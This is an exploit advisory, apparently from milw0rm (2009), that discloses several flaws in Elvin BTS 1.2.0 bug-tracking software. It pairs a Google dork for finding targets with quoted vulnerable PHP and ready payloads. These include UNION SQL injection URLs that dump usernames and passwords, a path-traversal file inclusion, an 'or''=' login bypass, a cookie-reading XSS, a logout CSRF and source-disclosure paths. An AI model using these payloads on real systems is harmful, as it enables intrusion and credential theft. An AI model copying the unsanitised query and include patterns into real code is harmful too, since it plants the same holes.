#################################################################################################################
[+] Elvin BTS 1.2.0 Multiple Remote VUlnerabilities
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################
- Script Homepage : http://www.elvinbts.org/
- Google Dork : Powered by Elvin Bug Tracking Server.
Elvin BTS suffers from a lot of vunerabilities
1) SQL Injection
2) Local File Inclusion
3) SQL Injection Login Bypass
4) Cross-Site Scripting
5) Cross-Site Request Forgery
6) Source Code Disclosure
----------------------- 1) SQL Injection -----------------------
- Vulnerable code is everywhere.I will present only 2 PoC's.
a) Vulnerable code in show_bug.php
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$query_bug = sprintf("SELECT * FROM " .$prefix_db. "_bug WHERE bg_id_pk=" .$_GET['id']. " AND bg_deleted_dt IS NULL");
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- PoC
http://127.0.0.1/[path]/show_bug.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+eb_profile--
b) Vulnerable code in show_activity.php
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$query_activity = sprintf("SELECT * FROM " .$prefix_db. "_activity WHERE ay_bugid_fk=" .$_GET['id']. "");
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- PoC
http://127.0.0.1/[path]/show_activity.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8+from+eb_profile--
----------------------- 2) Local File Inclusion -----------------------
- Vulnerable code in page.php
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$filename = "pages/".$_GET['id'];
................................................
if(file_exists($filename)){
include($filename);
} else {
echo "<h2>Sorry page cannot be found!</h2>";
}
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- PoC
http://127.0.0.1/[path]/page.php?id=../../../../../../BOOTSECT.BAK
----------------------- 3) SQL Injection Login Bypass-----------------------
- Code in login.php ( in login.php is included the vulnerable code)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
include(LoadElvinModule('login.ei'));
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- Vulnerable code in inc/login.ei
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$query_login = sprintf("SELECT * FROM " .$prefix_db. "_profile WHERE ac_user_vc='" .$_POST['inUser']. "' AND ac_pass_vc='" .$_POST['inPass']. "'");
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- PoC
Login as :
Username : 'or''='
Password : 'or''='
----------------------- 4) Cross-Site Scripting-----------------------
It's more XSS's in the script,but tired to find them all.
- Vulnerable code in show_activity.php
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<p>Back to bug # <a href="show_bug.php?id=<?php echo $_GET['id']; ?>"><?php echo $_GET['id']; ?></a></a></p>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- PoC
http://127.0.0.1/[path]/show_activity.php?id=<script>alert(document.cookie)</script>
----------------------- 5) Cross-Site Request Forgery-----------------------
Logout CSRF
- PoC
http://127.0.0.1/[path]/login.php?logout
----------------------- 6) Source Code Disclosure-----------------------
Go to /inc/ directory.You will se .ei files with php code inside.
That files are included and used by the script.
- PoC's
http://127.0.0.1/[path]/inc/login.ei
http://127.0.0.1/[path]/inc/jump_bug.ei
http://127.0.0.1/[path]/inc/create_account.ei
Etc..
############################################### EOF ##################################################
# milw0rm.com [2009-06-15]